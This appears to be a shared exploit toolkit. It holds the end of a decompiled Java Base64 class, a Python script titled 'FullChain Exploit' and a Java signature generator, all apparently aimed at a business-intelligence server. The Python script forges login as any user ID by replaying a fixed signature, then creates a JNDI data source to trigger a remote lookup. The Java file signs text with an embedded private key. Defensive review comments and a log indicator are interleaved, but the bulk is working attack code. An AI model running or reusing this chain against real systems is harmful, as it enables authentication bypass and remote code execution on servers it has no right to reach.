        public OutputStream(final java.io.OutputStream out, final boolean e, final boolean f) {
            super(out);
            this.F = f;
            this.E = e;
            this.D = (e ? 3 : 4);
            this.C = new byte[this.D];
            this.B = 0;
            this.A = 0;
        }
        
        @Override
        public void write(final int n) throws IOException {
            if (this.E) {
                this.C[this.B++] = (byte)n;
                if (this.B >= this.D) {
                    this.out.write(B(this.C, this.D));
                    this.A += 4;
                    if (this.F && this.A >= 76) {
                        this.out.write(10);
                        this.A = 0;
                    }
                    this.B = 0;
                }
            }
            else if (Base64.C[n & 0x7F] > -5) {
                this.C[this.B++] = (byte)n;
                if (this.B >= this.D) {
                    this.out.write(B(this.C));
                    this.B = 0;
                }
            }
            else if (Base64.C[n & 0x7F] != -5) {
                throw new IOException("Invalid character in Base64 data.");
            }
        }
        
        @Override
        public void write(final byte[] array, final int n, final int n2) throws IOException {
            for (int i = 0; i < n2; ++i) {
                this.write(array[n + i]);
            }
        }
        
        @Override
        public void flush() throws IOException {
            super.flush();
            if (this.B > 0) {
                if (!this.E) {
                    throw new IOException("Base64 input not properly padded.");
                }
                this.out.write(B(this.C, this.B));
                this.B = 0;
            }
            this.out.flush();
        }
        
        @Override
        public void close() throws IOException {
            super.close();
            this.out.close();
            this.C = null;
            this.out = null;
        }
    }
}

FullChain.py

import requests, os, uuid, json

# Command-line inputs: the identity sent as "ipPerson", the target base URL,
# and the string placed in the data source's "JNDI Datasource Name" field.
# `os.sys` is the sys module reached through the os module's namespace.
ID = os.sys.argv[1]
url = os.sys.argv[2]
jndi = os.sys.argv[3]

# One session shared by both steps, so the state left by loginAs() is carried
# into triggerJNDI(). The initial GET presumably collects the session cookie.
s = requests.Session()
s.get(url)

def loginAs(ID):
	"""POST the fixed, pre-signed form to /StoryBody.i4 with ipPerson set to ID.

	Always returns True; the HTTP response is not examined, so the return
	value says nothing about whether the server accepted the request.
	"""
	print(f"LOG: Attempting to Bypass Auth as User ID - {ID}")
	# Constant Base64 signature sent as the "s" field together with the constant
	# storyUUID and ts values it belongs to. A signature that can be replayed
	# unchanged indicates the server neither binds it to a per-installation key
	# nor checks "ts" for freshness (inference -- confirm with the advisory).
	validSig = """FeHGWgaVoDHPbZYf0+I6BSAHBSacV/2MjbVtnaHLbnuW3cr0sLs2rwo1MWtZ1mtmNwjLLY1nXfZX+BL9FMwc4poix6WpEvQTGr0oxOmOQe82SF0/iJV8FRYNZPEJ8vVjuMh9c7zxo6A1zEqWRiTdWx5HFvF+saEIug6ujYIXx8jptzxMzkRn77FIx4McnPBLlfoodjkKXufrsK2JBOvqXjOsgJqv9SdZqcbm9LnQ4GolYGCHvsLZ9MTHFzIS37TNjRULVupdC92f+90Any6FvIYMsGiozp/c235+xPV68WNmLgLFsYyRR7RjN4oWq7yb+T5hIhlQnJr8CIej2eVq6w=="""
	s.post(
		url+"/StoryBody.i4",
		data = {
			"storyUUID": "PEWPEW",
			"ts": "XXD",
			"s":validSig,
			"action":"WHATEVER",
			"ipPerson":ID,
			"ipOrg":"1"
		}
	)
	return True

def triggerJNDI(jndi):
	"""Submit a "save" request for a JNDI-type data source named by *jndi*.

	Prints the JSON reply; raises if the reply is not JSON.
	"""
	print(f"LOG: Trigger JNDI Post Auth Exp - {jndi}")
	# Data-source definition as the admin UI would send it. The only
	# caller-controlled value is the "JNDI Datasource Name" parameter.
	# Defensive notes: a JNDI name taken from a request should be restricted to
	# an allow-list of locally defined resources, data-source creation should
	# require an administrative role, and the application server should not be
	# able to open outbound LDAP/RMI connections.
	payload = {
    	"restrictedSourceCreation": False,
    	"displaySourceIcon": "connection_type_jndi",
    	"sourceClassName": "com.hof.sources.JNDISourcePlatformImplementation",
    	"enabledForTransformations": False,
    	"connectionMethodCode": "JNDI",
    	"displaySourceLongDescription": "",
    	"customParameters": [
        	{
            	"displayType": 4,
            	"defaultValue": "",
            	"displayName": "JNDI Datasource Name",
            	"uniqueKey": "DATABASEURL",
            	"disabled": False,
            	"refreshOnChange": False,
            	"value": jndi,
            	"clearsAllParameters": False,
            	"options": None
        	}
    	],
    	"userCanCreateView": True,
    	"databaseTypeCode": "GENERICJDBC",
    	"displaySourceName": "JNDI",
    	"validationMessages": "",
    	"sourceName": "PEW",
    	"sourceDescription": "HACKED"
	}
	# "testConnection": "true" presumably makes the server resolve the name as
	# part of handling this request rather than on first use -- confirm.
	# Log-side indicator (hedged): POSTs to /CreateSimpleSourceAjax.i4 whose
	# JSON has connectionMethodCode "JNDI" and a name containing a URL scheme.
	r=s.post(
		url+f"/CreateSimpleSourceAjax.i4;tab_token={uuid.uuid4()};m=1?REQUESTTOKEN=None",
		data = {
			"action":"save",
			"json": json.dumps(payload),
			"testConnection": "true",
			"importPredefinedContent":""
		}
	)
	print(r.json())

if __name__ == '__main__':
	# Runs the two steps back to back on the shared session. Neither step
	# reports failure to the caller, so "DONE" only means both requests were
	# sent (or that r.json() parsed), not that either one was accepted.
	print("LOG: Starting FullChain Exploit!!!")
	loginAs(ID)
	triggerJNDI(jndi)
	print("LOG: DONE")

GenSig.java

import java.security.KeyFactory;
import java.security.PrivateKey;
import java.security.spec.PKCS8EncodedKeySpec;
import java.util.Base64;
import java.security.spec.InvalidKeySpecException;
import java.security.NoSuchAlgorithmException;
import java.security.Signature;
import java.nio.charset.StandardCharsets;
import java.security.InvalidKeyException;
import java.security.SignatureException;


/**
 * Signs a fixed two-line text with an RSA private key embedded in the source
 * and prints the Base64 signature.
 *
 * Review note (defensive): the private key is a string constant in this file.
 * NOTE(review): presumably it is the key shipped with the product -- confirm
 * against the vendor advisory. A signature only authenticates its sender while
 * the private key stays secret, so a key distributed with software cannot
 * protect anything; the remedy is a key pair generated per installation and
 * kept in protected storage.
 */
class GenSig {
    // Base64 text of a PKCS#8-encoded private key (decoded in main()).
    static public String pkeyS = "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";
    // RSA KeyFactory; assigned in main() before getPrivate() is called.
    private static KeyFactory B;

    /**
     * Builds a PrivateKey from PKCS#8-encoded bytes using the factory in B.
     * B must already be set, otherwise this throws NullPointerException.
     */
    public static PrivateKey getPrivate(final byte[] encodedKey) throws InvalidKeySpecException {
        return GenSig.B.generatePrivate(new PKCS8EncodedKeySpec(encodedKey));
    }
    /** Signs the fixed text with SHA512withRSA and prints the Base64 result. */
    public static void main(String[] args) throws NoSuchAlgorithmException, InvalidKeySpecException, InvalidKeyException, SignatureException {
        GenSig.B = KeyFactory.getInstance("RSA");
        // The message is a constant; command-line arguments are ignored.
        String txt = "ASSETNOTE\nTEAM";
        PrivateKey pew = GenSig.getPrivate(Base64.getDecoder().decode(pkeyS));
        final byte[] bytes = txt.getBytes(StandardCharsets.UTF_8);
        final Signature instance = Signature.getInstance("SHA512withRSA");
        instance.initSign(pew);
        instance.update(bytes);
        // java.util.Base64 here, not the hand-written Base64 class of Enc.java.
        String out = new String(Base64.getEncoder().encode(instance.sign()));
        System.out.println(out);
    }

}

 

标签:工具分享